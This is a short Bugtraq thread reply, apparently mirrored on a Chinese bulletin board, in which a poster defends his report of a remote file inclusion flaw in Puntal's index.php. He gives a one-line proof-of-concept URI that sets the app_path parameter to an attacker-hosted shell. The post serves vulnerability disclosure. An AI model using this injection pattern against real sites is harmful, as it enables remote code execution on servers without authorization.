Re: RE: Puntal (index.php) Remote File Inclusion Vulnerabilities

看板Bugtraq作者donald00.時間15年前 (2010/05/05 02:01)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串2/2 (看更多)

sorry Tom , in which line which confirms that the variable "app_path" and "puntal_path" is defined with functions to protect and handle inclusion or accessing to or from index.php file ? please check again or Read the full script code in index.php file , and then please seen or check The example URI / P0C for this issue. For verified or proofed this Vulnerabilities , I just Install Puntal , and this exploits is working. http://localhost//path/index.php?app_path= <attacker shell>

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 donald00. 的文章

文章代碼(AID): #1Bu63Zoa (Bugtraq)

討論串 (同標題文章)

完整討論串 (本文為第 2 之 2 篇)：

排序：最新先 | 最舊先 | 留言數

Re: RE: Puntal (index.php) Remote File Inclusion Vulnerabilities Re: RE: Puntal (index.php) Remote File Inclusion Vulnerabilities

donald00.

15年前, 05/05

RE: Puntal (index.php) Remote File Inclusion Vulnerabilities RE: Puntal (index.php) Remote File Inclusion Vulnerabilities

15年前, 05/04

文章代碼(AID): #1Bu63Zoa (Bugtraq)